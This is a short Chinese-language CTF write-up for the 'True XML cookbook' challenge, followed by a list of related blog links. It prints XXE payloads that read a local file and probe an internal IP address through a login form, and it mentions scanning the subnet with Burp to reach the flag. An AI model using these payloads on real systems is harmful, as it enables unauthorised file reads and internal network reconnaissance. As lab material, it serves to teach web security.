True XML cookbook

打开题目

看到登录口

随便输入admin,123456,然后抓包试一下

先按原来那道题的payload进行测试,payload和结果如下:

<?xml version="1.0" ?>

<!DOCTYPE llw [

<!ENTITY file SYSTEM "file:///flag">

]>

<user>

<username>&file;</username>

<password>1</password>

</user>

未成功获取到flag信息,试着探测内网信息,读取下系统内的配置文件信息看是否能发现有用的信息

这里获得一个新的地址,尝试下进行连接结果如下:

<?xml version="1.0" ?>

<!DOCTYPE llw [

<!ENTITY file SYSTEM "http://10.244.80.49/">

]>

<user>

<username>&file;</username>

<password>1</password>

</user>

连接失败,那就查询下同网段内存在不存在其他地址,使用bp的爆破模块进行爆破,设置如下:

扫描可得到flag

相关推荐
一条晓鱼9 小时前
repo xml语法
xml
萝卜白菜。2 天前
关于Java EE应用中xml解析类的问题
xml·java·java-ee
ejinxian3 天前
protobuf 、JSON、XML传输格式
xml·json·protobuf
yue0083 天前
C# XML文件的读写V2.0
xml·开发语言·c#
emma羊羊5 天前
【weblogic】XML反序列化漏洞
xml·安全
研來如此6 天前
XML与HTML
xml·html
一个W牛7 天前
报文比对工具(xml和sop)
xml·前端·javascript
Java&Develop7 天前
使用 JDOM 库生成 XML 文件并返回 File
xml
关关长语7 天前
Dotnet使用System.Xml.Serialization处理Xml序列化
xml·c#·.net
Dolphin_Home7 天前
轻量实用的 XML 与 JSON / 对象互转工具类(Jackson 实现)
xml·java·json